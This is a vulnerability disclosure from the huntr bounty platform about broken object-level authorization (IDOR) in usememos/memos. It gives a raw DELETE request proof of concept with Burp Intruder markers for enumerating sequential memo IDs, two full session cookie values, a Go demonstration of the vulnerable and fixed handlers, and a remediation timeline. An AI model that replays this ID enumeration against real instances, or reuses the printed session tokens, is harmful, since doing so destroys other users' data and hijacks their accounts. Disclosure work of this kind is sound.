A user can delete other users' posts in usememos/memos

Valid

Reported on

Dec 26th 2022


Description

As the title says, an authenticated attacker can delete any other user's post (memo) by supplying its post ID in a DELETE request. Post IDs are sequential integers, so valid IDs can be brute-forced.

A video PoC is available here: https://drive.google.com/file/d/18QucWYwkpO9kVPMqNzSQ-ptwrZGk-UP9/view?usp=share_link

Proof of Concept

DELETE /api/memo/$1026$ HTTP/2
Host: demo.usememos.com
Cookie: memos_session=MTY3MjAyMzkzNnxEdi1GQkFFQ180WUFBUkFCRUFBQUhfLUdBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfOUk9fMqNUegFqgfGemADcwgQYFDYFrRl2lsWdeCjjKUx_uEW
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demo.usememos.com/
Origin: https://demo.usememos.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

The number 1026 is the memo (post) ID; the `$...$` markers around it are the Burp Intruder payload position and are not part of the real path. Memo IDs are sequential: every newly created memo gets the previous ID plus one, so an attacker who has created a memo knows roughly where everyone else's IDs lie and can enumerate them. Because the server never checks that the memo belongs to the session user, sending this DELETE request with any valid ID removes another user's memo.

Here are the session cookies for the two accounts used in the PoC (the request above is sent with the attacker's cookie against a memo created by the demo user):

Attacker session cookie: memos_session=MTY3MjAyMzkzNnxEdi1GQkFFQ180WUFBUkFCRUFBQUhfLUdBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfOUk9fMqNUegFqgfGemADcwgQYFDYFrRl2lsWdeCjjKUx_uEW

Demo user session cookie: memos_session=MTY3MjAyMzI4MXxEdi1GQkFFQ180WUFBUkFCRUFBQUhfLUdBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfOUE9fP5tDVSp1CxdxPlf5c_7FWcF5Yb5SFR7POch2HJbm_WD
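The missing check, as an added example that is not code from usememos/memos and not the 0.9.1 fix itself: a minimal Go reconstruction of the vulnerable delete path beside a hardened one that compares the memo's creator with the user behind the session cookie. The in-memory Store with auto-incremented IDs, the sessions map standing in for decoding the memos_session cookie, the constructed tokens, and every function name here are assumptions for the illustration; the real project uses a database-backed store and its own session handling.

```go
package main

import (
	"errors"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strconv"
	"strings"
)

// Memo keeps only the fields the authorization decision needs.
type Memo struct{ ID, CreatorID int }

// Store is a toy in-memory memo table; IDs are auto-incremented on purpose.
type Store struct {
	nextID int
	memos  map[int]*Memo
}

func NewStore() *Store { return &Store{nextID: 1, memos: map[int]*Memo{}} }

func (s *Store) Create(creatorID int) *Memo {
	m := &Memo{ID: s.nextID, CreatorID: creatorID}
	s.memos[m.ID] = m
	s.nextID++
	return m
}

var ErrNotFound = errors.New("memo not found")
var ErrForbidden = errors.New("caller does not own this memo")

type deleteFunc func(s *Store, callerID, memoID int) error

// deleteMemoUnchecked reproduces the vulnerable behaviour: the ID from the URL
// is trusted and the memo's creator is never compared with the caller.
func deleteMemoUnchecked(s *Store, callerID, memoID int) error {
	if _, ok := s.memos[memoID]; !ok {
		return ErrNotFound
	}
	delete(s.memos, memoID) // callerID is never consulted
	return nil
}

// deleteMemoOwned is the hardened form: refuse unless the caller created the memo.
func deleteMemoOwned(s *Store, callerID, memoID int) error {
	m, ok := s.memos[memoID]
	if !ok {
		return ErrNotFound
	}
	if m.CreatorID != callerID {
		return ErrForbidden
	}
	delete(s.memos, memoID)
	return nil
}

// newDeleteHandler serves DELETE /api/memo/:id with the given variant. The sessions
// map (cookie value -> user ID, 0 = no session) stands in for decoding memos_session.
func newDeleteHandler(s *Store, sessions map[string]int, del deleteFunc) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		c, err := r.Cookie("memos_session")
		if err != nil || sessions[c.Value] == 0 {
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		memoID, err := strconv.Atoi(strings.TrimPrefix(r.URL.Path, "/api/memo/"))
		if err != nil {
			http.Error(w, "bad memo id", http.StatusBadRequest)
			return
		}
		switch err = del(s, sessions[c.Value], memoID); {
		case errors.Is(err, ErrNotFound):
			http.Error(w, err.Error(), http.StatusNotFound)
		case errors.Is(err, ErrForbidden):
			http.Error(w, err.Error(), http.StatusForbidden)
		default:
			w.WriteHeader(http.StatusOK)
		}
	})
}

// sendDelete replays the report's request in-process and returns the status code.
func sendDelete(h http.Handler, memoID int, cookie string) int {
	req := httptest.NewRequest(http.MethodDelete, "/api/memo/"+strconv.Itoa(memoID), nil)
	req.AddCookie(&http.Cookie{Name: "memos_session", Value: cookie})
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, req)
	return rec.Code
}

func main() {
	// Constructed session tokens: user 1 is the "demo" account, user 2 the attacker.
	sessions := map[string]int{"demo-session": 1, "attacker-session": 2}
	for i, del := range []deleteFunc{deleteMemoUnchecked, deleteMemoOwned} {
		store := NewStore()
		victim := store.Create(1) // created first, so its ID (1) is trivially guessable
		code := sendDelete(newDeleteHandler(store, sessions, del), victim.ID, "attacker-session")
		_, survives := store.memos[victim.ID]
		fmt.Printf("variant %d: attacker DELETE -> %d, victim memo survives=%v\n", i, code, survives)
	}
}
```

Run it and variant 0 (unchecked) answers 200 and drops the demo user's memo, while variant 1 (owned) answers 403 and leaves it in place. Whether to return 403 or 404 on an ownership mismatch is a design choice: 404 avoids confirming that a guessed ID exists, which matters more when IDs are sequential, but either is correct as long as the creator comparison happens before the delete.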

Impact

This vulnerability affects every user of an instance: any authenticated account can delete any other user's memos, because the delete endpoint checks only that the caller is logged in and not that the caller owns the memo (broken object-level authorization, i.e. an IDOR). Since memo IDs are sequential, an attacker can iterate the ID range and remove all memos on the instance.

Timeline

5 months ago: huntr: We are processing your report and will contact the usememos/memos team within 24 hours.
5 months ago: Nguyen Minh Quang modified the report.
5 months ago: Nguyen Minh Quang modified the report.
4 months ago: huntr: We have contacted a member of the usememos/memos team and are waiting to hear back.
4 months ago: Nguyen Minh Quang modified the report.
4 months ago: STEVEN validated this vulnerability. Nguyen Minh Quang has been awarded the disclosure bounty; the fix bounty is now up for grabs; the researcher's credibility has increased: +7.
4 months ago: STEVEN marked this as fixed in 0.9.1 with commit 3556ae. STEVEN has been awarded the fix bounty. This vulnerability has been assigned a CVE.
4 months ago: STEVEN published this vulnerability.